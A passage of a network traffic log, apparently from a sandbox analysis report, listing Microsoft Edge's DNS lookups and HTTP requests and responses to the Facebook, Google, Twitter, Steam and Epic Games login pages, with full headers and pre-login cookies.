content-type: multipart/form-data; boundary=---------------------------7e7394292044a
accept-encoding: gzip, deflate, br
content-length: 2241
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: Gr/bpk2DJAYpP6K3pyQHUL0mB+NUhg7pT/LIADqUw1+KaCjQXWapMBEEy6vlE3p8KtvVZ/Ag5+AIZypksRQWMQ==
content-length: 0
date: Fri, 03 Nov 2023 04:50:47 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=3&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=3&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e7356322044a
accept-encoding: gzip, deflate, br
content-length: 895
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: rLd0TdvC4IKwBNu4QT1xBc1/KeoGO1LpL1kDLk6tmb3rCyoUpr4LnmKlqSjDGz+kDecKkDvbLF7/85o0ELTyxA==
content-length: 0
date: Fri, 03 Nov 2023 04:50:52 GMT
alt-svc: h3=":443"; ma=86400
POST

https://www.facebook.com/ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=4&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU

MicrosoftEdgeCP.exe

Remote address:

157.240.247.35:443

Request

POST /ajax/bz?__a=1&__aaid=0&__ccg=EXCELLENT&__dyn=7xe6E5aQ1PyUbFuC1swgE98nwgU6C7UW3q327E2vwXw5ux60Vo1upE4W0OE2WxO2O1Vw8G1Qw5Mx61vw5zwwwi81nE1u83mwaS0zK1swc-0lK3qaw4kwbS1Lw4Cwcq&__hs=19664.BP%3ADEFAULT.2.0..0.0&__hsi=7297093542137434357&__req=4&__rev=1009667778&__s=%3A%3A33ib9c&__spin_b=trunk&__spin_r=1009667778&__spin_t=1698986986&__user=0&dpr=1&jazoest=21030&lsd=AVrHoFl_hxU HTTP/2.0
host: www.facebook.com
accept: */*
origin: https://www.facebook.com
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
content-type: multipart/form-data; boundary=---------------------------7e725c362044a
accept-encoding: gzip, deflate, br
content-length: 4817
cache-control: no-cache

Response

HTTP/2.0 200

reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-expose-headers: X-FB-Debug, X-Loader-Length
access-control-allow-methods: OPTIONS
access-control-allow-credentials: true
access-control-allow-origin: https://www.facebook.com
vary: Origin
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: FOFJPRHGLQ1W+C1JgUrivcS6KN6v7E8HR83E4m+DdMiBgybCUCcrId++ulkIRERwWFPei6YUisULZwaShVhXhg==
content-length: 0
date: Fri, 03 Nov 2023 04:50:56 GMT
alt-svc: h3=":443"; ma=86400
DNS

accounts.google.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

accounts.google.com

IN A

Response

accounts.google.com

IN A

142.251.36.45
DNS

35.247.240.157.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.247.240.157.in-addr.arpa

IN PTR

Response

35.247.240.157.in-addr.arpa

IN PTR

edge-star-mini-shv-01-ams2facebookcom
GET

https://accounts.google.com/

MicrosoftEdgeCP.exe

Remote address:

142.251.36.45:443

Request

GET / HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
strict-transport-security: max-age=31536000; includeSubDomains
set-cookie: __Host-GAPS=1:hLzaZOrZ3-87M_n6QtrAP12P2mhXWg:42k5LuhEiLMKWnU8;Path=/;Expires=Sun, 02-Nov-2025 04:49:47 GMT;Secure;HttpOnly;Priority=HIGH
x-frame-options: DENY
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
location: https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
content-encoding: gzip
date: Fri, 03 Nov 2023 04:49:47 GMT
expires: Fri, 03 Nov 2023 04:49:47 GMT
cache-control: private, max-age=0
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 237
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F

MicrosoftEdgeCP.exe

Remote address:

142.251.36.45:443

Request

GET /ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:hLzaZOrZ3-87M_n6QtrAP12P2mhXWg:42k5LuhEiLMKWnU8

Response

HTTP/2.0 302

content-type: application/binary
set-cookie: __Host-GAPS=1:zGED4zJo6XtV_P3Iw8AUCwsrHwyttA:Z1q4H4q9nEZHWtav; Expires=Sun, 02-Nov-2025 04:49:48 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 03 Nov 2023 04:49:48 GMT
location: https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxr4nqzflxMucHAYpg8g-BtrkxjGY15MEN3hEwhMJUUS4NO8awXHIJybptFC9_v60r-I-dobQ
strict-transport-security: max-age=31536000; includeSubDomains
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
cross-origin-opener-policy: unsafe-none
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport;worker-src 'self'
content-security-policy: require-trusted-types-for 'script';report-uri /_/AccountsSigninPassiveLoginHttp/cspreport
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-resource-policy: cross-origin
server: ESF
content-length: 0
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxr4nqzflxMucHAYpg8g-BtrkxjGY15MEN3hEwhMJUUS4NO8awXHIJybptFC9_v60r-I-dobQ

MicrosoftEdgeCP.exe

Remote address:

142.251.36.45:443

Request

GET /InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=AVQVeyxr4nqzflxMucHAYpg8g-BtrkxjGY15MEN3hEwhMJUUS4NO8awXHIJybptFC9_v60r-I-dobQ HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:zGED4zJo6XtV_P3Iw8AUCwsrHwyttA:Z1q4H4q9nEZHWtav

Response

HTTP/2.0 302

content-type: text/html; charset=UTF-8
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 03 Nov 2023 04:49:48 GMT
location: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyL8rBsF7ahukjmZT6G8haiivnujMEGE_uFAcIdn3ziW-iMZtmjf9UvDX1uwO2dE9v44VrnJg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1593708161%3A1698986988785094&theme=glif
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-security-policy: require-trusted-types-for 'script';report-uri /cspreport
content-security-policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 382
server: GSE
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GET

https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyL8rBsF7ahukjmZT6G8haiivnujMEGE_uFAcIdn3ziW-iMZtmjf9UvDX1uwO2dE9v44VrnJg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1593708161%3A1698986988785094&theme=glif

MicrosoftEdgeCP.exe

Remote address:

142.251.36.45:443

Request

GET /v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=AVQVeyyL8rBsF7ahukjmZT6G8haiivnujMEGE_uFAcIdn3ziW-iMZtmjf9UvDX1uwO2dE9v44VrnJg&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S-1593708161%3A1698986988785094&theme=glif HTTP/2.0
host: accounts.google.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: __Host-GAPS=1:zGED4zJo6XtV_P3Iw8AUCwsrHwyttA:Z1q4H4q9nEZHWtav

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
x-frame-options: DENY
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
set-cookie: __Host-GAPS=1:IPrjpzC1W76z28c9cHCKBZyyLfS8qg:W8nW8qn3fNqUqOcz; Expires=Sun, 02-Nov-2025 04:49:49 GMT; Path=/; Secure; HttpOnly; Priority=HIGH
x-auto-login: realm=com.google&args=continue%3Dhttps://accounts.google.com/
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 03 Nov 2023 04:49:49 GMT
strict-transport-security: max-age=31536000; includeSubDomains
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
content-security-policy: script-src 'unsafe-inline' https: http:;object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'
content-security-policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
cross-origin-resource-policy: same-site
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

store.steampowered.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

store.steampowered.com

IN A

Response

store.steampowered.com

IN A

104.85.0.101
DNS

twitter.com

MicrosoftEdge.exe

Remote address:

8.8.8.8:53

Request

twitter.com

IN A

Response

twitter.com

IN A

104.244.42.129
DNS

121.208.253.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

121.208.253.8.in-addr.arpa

IN PTR

Response
DNS

45.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

45.36.251.142.in-addr.arpa

IN PTR

Response

45.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f131e100net
DNS

35.36.251.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

35.36.251.142.in-addr.arpa

IN PTR

Response

35.36.251.142.in-addr.arpa

IN PTR

ams17s12-in-f31e100net
DNS

steamcommunity.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.207.106.113
DNS

www.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.epicgames.com

IN A

Response

www.epicgames.com

IN CNAME

epicgames.com

epicgames.com

IN A

34.198.71.3

epicgames.com

IN A

54.164.77.27

epicgames.com

IN A

34.230.126.111

epicgames.com

IN A

54.175.89.124

epicgames.com

IN A

3.215.51.251

epicgames.com

IN A

18.235.28.127

epicgames.com

IN A

18.213.62.54

epicgames.com

IN A

18.233.1.119
GET

https://twitter.com/i/flow/login

MicrosoftEdgeCP.exe

Remote address:

104.244.42.129:443

Request

GET /i/flow/login HTTP/2.0
host: twitter.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 400

date: Fri, 03 Nov 2023 04:49:48 GMT
perf: 7626143928
server: tsa_o
set-cookie: guest_id=v1%3A169898698845610780; Max-Age=34214400; Expires=Tue, 03 Dec 2024 04:49:48 GMT; Path=/; Domain=.twitter.com; Secure
content-type: text/html; charset=utf-8
x-powered-by: Express
cache-control: no-cache, no-store, max-age=0
x-transaction-id: ca7f3b665d915995
x-xss-protection: 0
strict-transport-security: max-age=631138519
content-encoding: gzip
content-length: 1001
x-response-time: 113
x-connection-hash: feb48130e47f35a282af430dba75255e6679b5cf66bb93ed7204375c0f683db9
GET

https://store.steampowered.com/login/

MicrosoftEdgeCP.exe

Remote address:

104.85.0.101:443

Request

GET /login/ HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Accept-Encoding: gzip, deflate, br
Host: store.steampowered.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://store.cloudflare.steamstatic.com/ https://store.cloudflare.steamstatic.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' http://store.steampowered.com https://store.steampowered.com http://127.0.0.1:27060 ws://127.0.0.1:27060 https://community.cloudflare.steamstatic.com/ https://steamcommunity.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://shared.cloudflare.steamstatic.com/ https://checkout.steampowered.com/ https://store.steampowered.com/; frame-src 'self' steam: http://www.youtube.com https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://steamcommunity.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/ https://steamcommunity.com/ https://help.steampowered.com/; frame-ancestors 'none';
Content-Encoding: gzip
Vary: Accept-Encoding
Strict-Transport-Security: max-age=10368000
Content-Length: 5715
Date: Fri, 03 Nov 2023 04:49:48 GMT
Connection: keep-alive
Set-Cookie: steamCountry=NL%7Cdf992469ad58783256e377c74f856554; Path=/; Secure; HttpOnly; SameSite=None
Set-Cookie: sessionid=0be86b5a35478ce46736c6f6; Path=/; Secure; SameSite=None
DNS

static.xx.fbcdn.net

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

static.xx.fbcdn.net

IN A

Response

static.xx.fbcdn.net

IN CNAME

scontent.xx.fbcdn.net

scontent.xx.fbcdn.net

IN A

157.240.5.10
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yF/l/0,cross/tlYVHfcv8SI.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yF/l/0,cross/tlYVHfcv8SI.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Wed, 30 Oct 2024 15:05:29 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: aeAnAU0Og7UqX479tqACRQ==
x-fb-debug: pq4A+7Xgz55bOGH117bunJ53j94eC8FIDKgiWmhcsMQ70Dn4NxWxBFejAAMuYLNZ99/GB/80j52bsB/J9FyV8g==
content-length: 1354
date: Fri, 03 Nov 2023 04:49:47 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yt/l/0,cross/_Spr5Be9x5O.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yt/l/0,cross/_Spr5Be9x5O.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
last-modified: Mon, 01 Jan 2001 08:00:00 GMT
expires: Fri, 01 Nov 2024 18:05:53 GMT
cache-control: public,max-age=31536000,immutable
timing-allow-origin: *
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
x-content-type-options: nosniff
reporting-endpoints:
origin-agent-cluster: ?0
content-md5: G/+GacV1zDVVAQ2oXLbmyg==
x-fb-debug: vQeTTxB4L9iLeQmnSNc4ZI9G+Jy/VqDYUbSY4EOKHlX8vtS2l03hDENDNfp1dZVFWrLb9qRiHMYgu1IG6XlM9w==
content-length: 1213
date: Fri, 03 Nov 2023 04:49:47 GMT
alt-svc: h3=":443"; ma=86400
GET

https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/EfoYxebGYR7.css?_nc_x=Ij3Wp8lg5Kz

MicrosoftEdgeCP.exe

Remote address:

157.240.5.10:443

Request

GET /rsrc.php/v3/yi/l/0,cross/EfoYxebGYR7.css?_nc_x=Ij3Wp8lg5Kz HTTP/2.0
host: static.xx.fbcdn.net
accept: text/css, */*
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: text/css; charset=utf-8
access-control-allow-origin: *
